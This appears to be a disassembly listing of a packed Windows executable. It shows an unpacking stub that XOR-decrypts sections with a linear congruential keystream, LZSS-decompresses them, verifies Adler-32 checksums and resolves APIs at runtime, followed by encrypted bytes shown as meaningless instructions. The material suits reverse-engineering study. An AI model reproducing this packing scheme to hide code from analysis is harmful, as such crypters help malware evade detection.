add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_410EE7
rep stosd
test edx, edx
jz short loc_410EED
loc_410EE7: ; CODE XREF: sub_410EA0+18�j
; sub_410EA0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_410EE7
loc_410EED: ; CODE XREF: sub_410EA0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_410EF3: ; CODE XREF: sub_410EA0+A�j
mov eax, [esp+arg_0]
retn
sub_410EA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410F00 proc near ; CODE XREF: sub_4103E8+13�p
jmp ds:dword_421034
sub_410F00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F10 proc near ; CODE XREF: sub_41D36C+40�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
lea eax, dword_42904C
cmp dword ptr [eax+8], 0
jnz short loc_410F63
mov al, 0FFh
mov edi, edi
loc_410F2C: ; CODE XREF: sub_410F10+28�j
; sub_410F10+48�j
or al, al
jz short loc_410F5E
mov al, [esi]
inc esi
mov ah, [edi]
inc edi
cmp ah, al
jz short loc_410F2C
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_410F2C
sbb al, al
sbb al, 0FFh
loc_410F5E: ; CODE XREF: sub_410F10+1E�j
movsx eax, al
jmp short loc_410F97
; ---------------------------------------------------------------------------
loc_410F63: ; CODE XREF: sub_410F10+16�j
mov eax, 0FFh
xor ebx, ebx
mov edi, edi
loc_410F6C: ; CODE XREF: sub_410F10+68�j
; sub_410F10+80�j
or al, al
jz short loc_410F97
mov al, [esi]
inc esi
mov bl, [edi]
inc edi
cmp al, bl
jz short loc_410F6C
push eax
push ebx
call sub_41072E
mov ebx, eax
add esp, 4
call sub_41072E
add esp, 4
cmp bl, al
jz short loc_410F6C
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_410F97: ; CODE XREF: sub_410F10+51�j
; sub_410F10+5E�j
pop ebx
pop esi
pop edi
leave
retn
sub_410F10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F9C proc near ; CODE XREF: sub_411310+183�p
; sub_411310+361�p
; DATA XREF: ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, edi
and esi, 0FFFFh
shr edi, 10h
test ecx, ecx
jnz short loc_410FBE
push 1
pop eax
jmp loc_4110B1
; ---------------------------------------------------------------------------
loc_410FBE: ; CODE XREF: sub_410F9C+18�j
cmp [ebp+arg_8], 0
jbe loc_4110AA
push ebx
loc_410FC9: ; CODE XREF: sub_410F9C+107�j
mov edx, 15B0h
cmp [ebp+arg_8], edx
jnb short loc_410FD6
mov edx, [ebp+arg_8]
loc_410FD6: ; CODE XREF: sub_410F9C+35�j
sub [ebp+arg_8], edx
cmp edx, 10h
jl loc_411079
mov eax, edx
shr eax, 4
mov ebx, eax
neg ebx
shl ebx, 4
add edx, ebx
loc_410FF0: ; CODE XREF: sub_410F9C+D7�j
movzx ebx, byte ptr [ecx]
add esi, ebx
movzx ebx, byte ptr [ecx+1]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+2]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+3]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+4]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+5]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+6]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+7]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+8]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+9]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Ah]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Bh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Ch]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Dh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Eh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Fh]
add edi, esi
add esi, ebx
add edi, esi
add ecx, 10h
dec eax
jnz loc_410FF0
loc_411079: ; CODE XREF: sub_410F9C+40�j
test edx, edx
jz short loc_411088
loc_41107D: ; CODE XREF: sub_410F9C+EA�j
movzx eax, byte ptr [ecx]
add esi, eax
inc ecx
add edi, esi
dec edx
jnz short loc_41107D
loc_411088: ; CODE XREF: sub_410F9C+DF�j
mov ebx, 0FFF1h
mov eax, esi
xor edx, edx
mov esi, ebx
div esi
mov eax, edi
mov esi, edx
xor edx, edx
div ebx
cmp [ebp+arg_8], 0
mov edi, edx
ja loc_410FC9
pop ebx
loc_4110AA: ; CODE XREF: sub_410F9C+26�j
mov eax, edi
shl eax, 10h
or eax, esi
loc_4110B1: ; CODE XREF: sub_410F9C+1D�j
pop edi
pop esi
pop ebp
retn
sub_410F9C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4110C0 proc near ; CODE XREF: sub_411310+15E�p
; sub_411310+33C�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_1C], ecx
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+var_1C]
mov eax, [ebp+arg_8]
mov [edx+4], eax
mov ecx, [ebp+var_1C]
mov edx, [ebp+arg_4]
mov [ecx+8], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_C]
mov [eax+0Ch], ecx
mov edx, [ebp+var_1C]
mov dword ptr [edx+14h], 0
mov eax, [ebp+var_1C]
mov dword ptr [eax+10h], 0
mov [ebp+var_10], 0
jmp short loc_411112
; ---------------------------------------------------------------------------
loc_411109: ; CODE XREF: sub_4110C0+65�j
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_411112: ; CODE XREF: sub_4110C0+47�j
cmp [ebp+var_10], 0FEEh
jge short loc_411127
mov edx, [ebp+var_1C]
add edx, [ebp+var_10]
mov byte ptr [edx+18h], 20h
jmp short loc_411109
; ---------------------------------------------------------------------------
loc_411127: ; CODE XREF: sub_4110C0+59�j
mov [ebp+var_8], 0FEEh
mov [ebp+var_4], 0
loc_411135: ; CODE XREF: sub_4110C0:loc_411266�j
mov eax, [ebp+var_4]
shr eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
and ecx, 100h
test ecx, ecx
jnz short loc_411169
mov ecx, [ebp+var_1C]
call sub_411280
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_411160
jmp loc_41126B
; ---------------------------------------------------------------------------
loc_411160: ; CODE XREF: sub_4110C0+99�j
mov edx, [ebp+var_C]
or dh, 0FFh
mov [ebp+var_4], edx
loc_411169: ; CODE XREF: sub_4110C0+88�j
mov eax, [ebp+var_4]
and eax, 1
test eax, eax
jz short loc_4111BA
mov ecx, [ebp+var_1C]
call sub_411280
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_411189
jmp loc_41126B
; ---------------------------------------------------------------------------
loc_411189: ; CODE XREF: sub_4110C0+C2�j
mov edx, [ebp+var_C]
mov ecx, [ebp+var_1C]
call sub_4112C0
mov ecx, [ebp+var_1C]
add ecx, [ebp+var_8]
mov dl, byte ptr [ebp+var_C]
mov [ecx+18h], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
and ecx, 0FFFh
mov [ebp+var_8], ecx
jmp loc_411266
; ---------------------------------------------------------------------------
loc_4111BA: ; CODE XREF: sub_4110C0+B1�j
mov ecx, [ebp+var_1C]
call sub_411280
mov [ebp+var_10], eax
cmp [ebp+var_10], 0FFFFFFFFh
jnz short loc_4111D0
jmp loc_41126B
; ---------------------------------------------------------------------------
loc_4111D0: ; CODE XREF: sub_4110C0+109�j
mov ecx, [ebp+var_1C]
call sub_411280
mov [ebp+var_14], eax
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_4111E6
jmp loc_41126B
; ---------------------------------------------------------------------------
loc_4111E6: ; CODE XREF: sub_4110C0+11F�j
mov edx, [ebp+var_14]
and edx, 0F0h
shl edx, 4
mov eax, [ebp+var_10]
or eax, edx
mov [ebp+var_10], eax
mov ecx, [ebp+var_14]
and ecx, 0Fh
add ecx, 2
mov [ebp+var_14], ecx
mov [ebp+var_18], 0
jmp short loc_411218
; ---------------------------------------------------------------------------
loc_41120F: ; CODE XREF: sub_4110C0+1A4�j
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
loc_411218: ; CODE XREF: sub_4110C0+14D�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_14]
jg short loc_411266
mov ecx, [ebp+var_10]
add ecx, [ebp+var_18]
and ecx, 0FFFh
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+ecx+18h]
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
mov ecx, [ebp+var_1C]
call sub_4112C0
mov ecx, [ebp+var_1C]
add ecx, [ebp+var_8]
mov dl, byte ptr [ebp+var_C]
mov [ecx+18h], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
and ecx, 0FFFh
mov [ebp+var_8], ecx
jmp short loc_41120F
; ---------------------------------------------------------------------------
loc_411266: ; CODE XREF: sub_4110C0+F5�j
; sub_4110C0+15E�j
jmp loc_411135
; ---------------------------------------------------------------------------
loc_41126B: ; CODE XREF: sub_4110C0+9B�j
; sub_4110C0+C4�j ...
mov edx, [ebp+var_1C]
mov eax, [edx+10h]
mov esp, ebp
pop ebp
retn 10h
sub_4110C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411280 proc near ; CODE XREF: sub_4110C0+8D�p
; sub_4110C0+B6�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov edx, [eax+14h]
cmp edx, [ecx+8]
jb short loc_41129A
or eax, 0FFFFFFFFh
jmp short loc_4112BB
; ---------------------------------------------------------------------------
loc_41129A: ; CODE XREF: sub_411280+13�j
mov eax, [ebp+var_4]
mov ecx, [eax]
mov edx, [ebp+var_4]
mov eax, [edx+14h]
xor edx, edx
mov dl, [ecx+eax]
mov eax, edx
mov ecx, [ebp+var_4]
mov edx, [ecx+14h]
add edx, 1
mov ecx, [ebp+var_4]
mov [ecx+14h], edx
loc_4112BB: ; CODE XREF: sub_411280+18�j
mov esp, ebp
pop ebp
retn
sub_411280 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4112C0 proc near ; CODE XREF: sub_4110C0+CF�p
; sub_4110C0+17E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], edx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov edx, [eax+10h]
cmp edx, [ecx+0Ch]
jb short loc_4112DC
jmp short loc_4112FD
; ---------------------------------------------------------------------------
loc_4112DC: ; CODE XREF: sub_4112C0+18�j
mov eax, [ebp+var_4]
mov ecx, [eax+4]
mov edx, [ebp+var_4]
mov eax, [edx+10h]
mov dl, byte ptr [ebp+var_8]
mov [ecx+eax], dl
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
add ecx, 1
mov edx, [ebp+var_4]
mov [edx+10h], ecx
loc_4112FD: ; CODE XREF: sub_4112C0+1A�j
mov esp, ebp
pop ebp
retn
sub_4112C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411310 proc near ; CODE XREF: _3:loc_411720�p
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 70h
push esi
push edi
push 0
call ds:dword_421014 ; GetModuleHandleA
mov [ebp+var_18], eax
push 0D440h
push 40h
call ds:dword_421010 ; LocalAlloc
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
sub eax, 402h
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
sub ecx, 4
mov [ebp+var_10], ecx
mov [ebp+var_1C], 0
mov [ebp+var_44], 1
mov [ebp+var_30], 0
mov [ebp+var_3C], offset aBarier ; "BARIER"
loc_411363: ; CODE XREF: sub_411310+98�j
; sub_411310+A0�j
mov edx, [ebp+var_10]
mov eax, [edx]
imul eax, 28h
mov ecx, [ebp+var_4]
add ecx, eax
mov edx, [ebp+var_44]
imul edx, 28h
sub ecx, edx
mov [ebp+var_30], ecx
mov eax, [ebp+var_44]
add eax, 1
mov [ebp+var_44], eax
mov ecx, [ebp+var_30]
mov edx, [ebp+var_18]
add edx, [ecx+0Ch]
mov [ebp+var_40], edx
mov eax, [ebp+var_30]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov edx, [ebp+var_30]
add ecx, [edx+8]
mov [ebp+var_2C], ecx
mov eax, [ebp+var_40]
cmp eax, [ebp+var_3C]
ja short loc_411363
mov ecx, [ebp+var_3C]
cmp ecx, [ebp+var_2C]
jnb short loc_411363
mov edx, [ebp+var_40]
mov [ebp+var_20], edx
jmp short loc_4113C3
; ---------------------------------------------------------------------------
loc_4113BA: ; CODE XREF: sub_411310+DA�j
mov eax, [ebp+var_40]
add eax, 4
mov [ebp+var_40], eax
loc_4113C3: ; CODE XREF: sub_411310+A8�j
mov ecx, [ebp+var_40]
cmp ecx, [ebp+var_2C]
jnb short loc_4113EC
mov edx, [ebp+var_20]
imul edx, 19660Dh
add edx, 3C6EF375h
mov [ebp+var_20], edx
mov eax, [ebp+var_40]
mov ecx, [eax]
xor ecx, [ebp+var_20]
mov edx, [ebp+var_40]
mov [edx], ecx
jmp short loc_4113BA
; ---------------------------------------------------------------------------
loc_4113EC: ; CODE XREF: sub_411310+B9�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov [ebp+var_24], ecx
mov edx, [ebp+var_24]
mov eax, [edx]
mov [ebp+var_28], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
mov [ebp+var_38], edx
mov eax, [ebp+var_24]
mov ecx, [eax+8]
mov [ebp+var_34], ecx
mov edx, [ebp+var_38]
push edx
push 40h
call ds:dword_421010 ; LocalAlloc
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_411430
cmp [ebp+var_38], 10000h
jbe short loc_411441
loc_411430: ; CODE XREF: sub_411310+115�j
push 0
push 0
push 0
push 0EF0000FEh
call ds:dword_42100C ; RaiseException
loc_411441: ; CODE XREF: sub_411310+11E�j
mov ecx, [ebp+var_38]
mov esi, [ebp+var_24]
add esi, 0Ch
mov edi, [ebp+var_1C]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_28]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_38]
push eax
mov ecx, [ebp+var_1C]
push ecx
mov ecx, [ebp+var_8]
call sub_4110C0
cmp eax, [ebp+var_28]
jz short loc_411489
push 0
push 0
push 0
push 0EF0000F8h
call ds:dword_42100C ; RaiseException
loc_411489: ; CODE XREF: sub_411310+166�j
mov edx, [ebp+var_28]
push edx
mov eax, [ebp+var_24]
push eax
push 0
call sub_410F9C
add esp, 0Ch
cmp eax, [ebp+var_34]
jz short loc_4114B1
push 0
push 0
push 0
push 0EF0000FAh
call ds:dword_42100C ; RaiseException
loc_4114B1: ; CODE XREF: sub_411310+18E�j
mov ecx, [ebp+var_1C]
push ecx
call ds:dword_421008 ; LocalFree
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_421014 ; GetModuleHandleA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4114E0
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_42100C ; RaiseException
loc_4114E0: ; CODE XREF: sub_411310+1BD�j
push offset aFlushinstructi ; "FlushInstructionCache"
mov edx, [ebp+var_C]
push edx
call ds:dword_421004 ; GetProcAddress
mov ds:dword_4245F0, eax
push offset aGetcurrentproc ; "GetCurrentProcess"
mov eax, [ebp+var_C]
push eax
call ds:dword_421004 ; GetProcAddress
mov [ebp+var_14], eax
cmp ds:dword_4245F0, 0
jnz short loc_411520
push 0
push 0
push 0
push 0EF0000FCh
call ds:dword_42100C ; RaiseException
loc_411520: ; CODE XREF: sub_411310+1FD�j
call [ebp+var_14]
mov ds:dword_42460C, eax
mov [ebp+var_48], 0
mov [ebp+var_68], 3
mov [ebp+var_58], 0
loc_41153D: ; CODE XREF: sub_411310+272�j
; sub_411310+27A�j
mov ecx, [ebp+var_10]
mov edx, [ecx]
imul edx, 28h
mov eax, [ebp+var_4]
add eax, edx
mov ecx, [ebp+var_68]
imul ecx, 28h
sub eax, ecx
mov [ebp+var_58], eax
mov edx, [ebp+var_68]
add edx, 1
mov [ebp+var_68], edx
mov eax, [ebp+var_58]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov [ebp+var_64], ecx
mov edx, [ebp+var_58]
mov eax, [ebp+var_18]
add eax, [edx+0Ch]
mov ecx, [ebp+var_58]
add eax, [ecx+8]
mov [ebp+var_54], eax
mov edx, [ebp+var_64]
cmp edx, [ebp+arg_0]
jnb short loc_41153D
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_54]
jnb short loc_41153D
mov ecx, [ebp+arg_0]
mov [ebp+var_64], ecx
mov edx, [ebp+var_64]
mov [ebp+var_4C], edx
mov eax, [ebp+var_64]
add eax, 0Ch
and al, 0FCh
mov [ebp+var_64], eax
jmp short loc_4115AE
; ---------------------------------------------------------------------------
loc_4115A5: ; CODE XREF: sub_411310+2C4�j
mov ecx, [ebp+var_64]
add ecx, 4
mov [ebp+var_64], ecx
loc_4115AE: ; CODE XREF: sub_411310+293�j
mov edx, [ebp+var_64]
cmp edx, [ebp+var_54]
jnb short loc_4115D6
mov eax, [ebp+var_4C]
imul eax, 19660Dh
add eax, 3C6EF375h
mov [ebp+var_4C], eax
mov ecx, [ebp+var_64]
mov edx, [ecx]
xor edx, [ebp+var_4C]
mov eax, [ebp+var_64]
mov [eax], edx
jmp short loc_4115A5
; ---------------------------------------------------------------------------
loc_4115D6: ; CODE XREF: sub_411310+2A4�j
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov [ebp+var_50], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov [ebp+var_60], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
mov [ebp+var_5C], eax
mov ecx, [ebp+var_60]
push ecx
push 40h
call ds:dword_421010 ; LocalAlloc
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_41160E
cmp [ebp+var_60], 10000h
jbe short loc_41161F
loc_41160E: ; CODE XREF: sub_411310+2F3�j
push 0
push 0
push 0
push 0EF0000FFh
call ds:dword_42100C ; RaiseException
loc_41161F: ; CODE XREF: sub_411310+2FC�j
mov ecx, [ebp+var_60]
mov esi, [ebp+arg_0]
add esi, 0Ch
mov edi, [ebp+var_48]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+var_50]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_60]
push edx
mov eax, [ebp+var_48]
push eax
mov ecx, [ebp+var_8]
call sub_4110C0
cmp eax, [ebp+var_50]
jz short loc_411667
push 0
push 0
push 0
push 0EF0000F9h
call ds:dword_42100C ; RaiseException
loc_411667: ; CODE XREF: sub_411310+344�j
mov ecx, [ebp+var_50]
push ecx
mov edx, [ebp+arg_0]
push edx
push 0
call sub_410F9C
add esp, 0Ch
cmp eax, [ebp+var_5C]
jz short loc_41168F
push 0
push 0
push 0
push 0EF0000FBh
call ds:dword_42100C ; RaiseException
loc_41168F: ; CODE XREF: sub_411310+36C�j
mov eax, [ebp+var_50]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, ds:dword_42460C
push edx
call ds:dword_4245F0 ; FlushInstructionCache
mov eax, [ebp+var_48]
push eax
call ds:dword_421008 ; LocalFree
mov ecx, [ebp+var_8]
push ecx
call ds:dword_421008 ; LocalFree
push offset dword_424988
call ds:dword_421000 ; InitializeCriticalSection
call sub_412300
push 68h
call sub_41BA4A
add esp, 4
mov [ebp+var_6C], eax
cmp [ebp+var_6C], 0
jz short loc_4116E8
mov ecx, [ebp+var_6C]
call sub_411DF0
mov [ebp+var_70], eax
jmp short loc_4116EF
; ---------------------------------------------------------------------------
loc_4116E8: ; CODE XREF: sub_411310+3C9�j
mov [ebp+var_70], 0
loc_4116EF: ; CODE XREF: sub_411310+3D6�j
mov edx, offset dword_411740
mov eax, [ebp+var_70]
mov [edx+4], eax
call sub_41C307
mov ds:dword_42903C, eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov ds:dword_424618, edx
mov eax, [ebp+var_4]
mov ds:off_42461C, eax
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_411310 endp
; ---------------------------------------------------------------------------
align 10h
loc_411720: ; CODE XREF: sub_411BAD�p
call sub_411310
pop eax
call loc_411E80
pop eax
mov [esp+24h], eax
popa
pop eax
pop eax
call eax
call sub_41D6F2
; ---------------------------------------------------------------------------
db 6 dup(0CCh)
dword_411740 dd 0 ; DATA XREF: sub_411310:loc_4116EF�o
; sub_41839F+2B�o ...
db 90h
db 1Eh, 85h, 0
dd 52454827h, 42534945h, 43544F4Fh, 2745444Fh, 6
aKbyr db 'KByR',0 ; DATA XREF: _5:off_42461C�o
align 4
dd 5000h, 1000h, 5 dup(0)
dd 0E0000080h, 5279424Bh, 0
dd 9000h, 6000h, 8400h, 400h, 3 dup(0)
dd 0E0000040h, 7273722Eh, 63h, 1000h, 0
dd 0C00h, 8800h, 3 dup(0)
dd 0E0000040h, 7865742Eh, 74h, 10D8Fh, 10000h, 0AE00h
dd 9400h, 3 dup(0)
dd 0E0000040h, 6164722Eh, 6174h, 0CC4h, 21000h, 0E00h
dd 14200h, 3 dup(0)
dd 0E0000040h, 7461642Eh, 61h, 7070h, 22000h, 1A00h, 15000h
dd 3 dup(0)
dd 0E0000040h, 0BFh dup(0)
dd 32000000h, 30353030h
db 35h, 31h, 38h
; ---------------------------------------------------------------------------
public start
start:
call $+5
pusha
call sub_411BAD
or al, 28h
; ---------------------------------------------------------------------------
dd 24FC4A8Fh, 3D2B4A7Fh, 0AA3C655Eh, 7E9C585Bh, 0DA310FFDh
dd 0BD9DA791h, 6BA7479h, 0A603F0ABh, 4206FA93h, 91DBB758h
dd 68E44543h, 7E9CEC4Fh, 0DA310FFDh, 7E9CA791h, 0DA310FFDh
; ---------------------------------------------------------------------------
xchg eax, ecx
cmpsd
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411B9E proc near ; CODE XREF: _3:00411F59�p _3:00412CD0�p ...
jmp sub_41847D
sub_411B9E endp
; ---------------------------------------------------------------------------
jmp loc_418496
; ---------------------------------------------------------------------------
jmp loc_418496
; =============== S U B R O U T I N E =======================================
sub_411BAD proc near ; CODE XREF: _3:00411B59�p
call loc_411720
jmp sub_420D80
sub_411BAD endp
; ---------------------------------------------------------------------------
jmp sub_420D80
; ---------------------------------------------------------------------------
dd 0CBCB4CE9h, 0E452E9DBh, 0E7E9626Dh, 0E9234555h, 0CAF38650h
dd 0D48F9C69h, 0E91DD9Eh, 1C4E2A77h, 0E954A1E0h, 20h, 0F3h
dd 2050700h, 874h, 5 dup(0)
; ---------------------------------------------------------------------------
aaa
push ecx
add al, 30h
and edi, ds:929B7A5Fh
retf 1E02h
; ---------------------------------------------------------------------------
aRBposta_exe_bo db 'RÏ¡posta.exe.BOX',0
align 4
dd 0Ch dup(0)
dd 2A2E2A00h, 63h dup(0)
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411DF0 proc near ; CODE XREF: sub_411310+3CE�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov dword ptr [eax+60h], 0
mov ecx, [ebp+var_8]
mov dword ptr [ecx+64h], 0
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_421014 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_411E32
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_42100C ; RaiseException
loc_411E32: ; CODE XREF: sub_411DF0+2F�j
mov edx, [ebp+var_8]
push edx
call ds:dword_421000 ; InitializeCriticalSection
mov eax, [ebp+var_8]
add eax, 18h
push eax
call ds:dword_421000 ; InitializeCriticalSection
mov ecx, [ebp+var_8]
add ecx, 30h
push ecx
call ds:dword_421000 ; InitializeCriticalSection
mov edx, [ebp+var_8]
add edx, 48h
push edx
call ds:dword_421000 ; InitializeCriticalSection
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_411DF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411E70 proc near ; CODE XREF: sub_416C60+50�p
push ebp
mov ebp, esp
mov eax, ds:dword_424608
mov al, [eax+70h]
pop ebp
retn
sub_411E70 endp
; ---------------------------------------------------------------------------
align 10h
loc_411E80: ; CODE XREF: _3:00411726�p
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
mov eax, [ebp+8]
mov ds:dword_424608, eax
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_424698 ; GetModuleHandleA
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz short loc_411EB9
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_4246F8 ; RaiseException
loc_411EB9: ; CODE XREF: _3:00411EA6�j
push offset aVirtualalloc ; "VirtualAlloc"
mov ecx, [ebp-8]
push ecx
call ds:dword_4246A8 ; GetProcAddress
mov [ebp-0Ch], eax
cmp dword ptr [ebp-0Ch], 0
jnz short loc_411EE2
push 0
push 0
push 0
push 0EF0000FCh
call ds:dword_4246F8 ; RaiseException
loc_411EE2: ; CODE XREF: _3:00411ECF�j
push 4
push 1000h
push 1000h
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_4245F4, eax
push 4
push 2000h
call ds:dword_4246BC ; GetTickCount
xor edx, edx
mov ecx, 8000h
div ecx
push edx
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_4245FC, eax
push 4
push 1000h
push 1000h
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_4245F8, eax
mov edx, ds:dword_4245F4
mov dword ptr [edx], 19660Dh
mov eax, ds:dword_4245F8
mov dword ptr [eax], 3C6EF35Fh
mov dword ptr [ebp-14h], 0
mov dword ptr [ebp-4], 0
push 2E0000h
call sub_411B9E
mov ch, 0A2h
or al, 85h
fsubr qword ptr [edi-251891FAh]
dec edi
imul ebx, [ebx-32h], 6316BDBh
xchg bl, [ecx-504336D7h]
setalc
push dword ptr [edi+7Bh]
outsb
popa
and ch, [ebp-13626B3Fh]
xchg eax, ecx
sub [ebx], dl
add ch, ds:9EA855D2h
xchg eax, ecx
jmp short loc_411FA6
; ---------------------------------------------------------------------------
dw 62A6h
dd 38BC7C2Ah, 0B3F58568h, 3E312407h, 346165C0h, 36A8C3Dh
; ---------------------------------------------------------------------------
fnclex
loc_411FA6: ; CODE XREF: _3:00411F8C�j
int 57h
out 1Ch, eax
icebp
cmc
in al, 0D7h
movsd
sar byte ptr [ebp+edx*4-14h], cl
mov edi, 0EF5A7EF6h
pop edi
; ---------------------------------------------------------------------------
db 0C4h, 0D1h, 0DEh
dd 120590EBh, 91D12C04h, 90929FA8h, 85D23390h, 8BEE75D2h
dd 0C0830845h, 0E8458971h, 21001B68h, 0FBBCE800h, 9090FFFFh
dd 0C985C933h, 558BEE75h, 8D8D52E8h, 0FFFFFF18h, 4064E8h
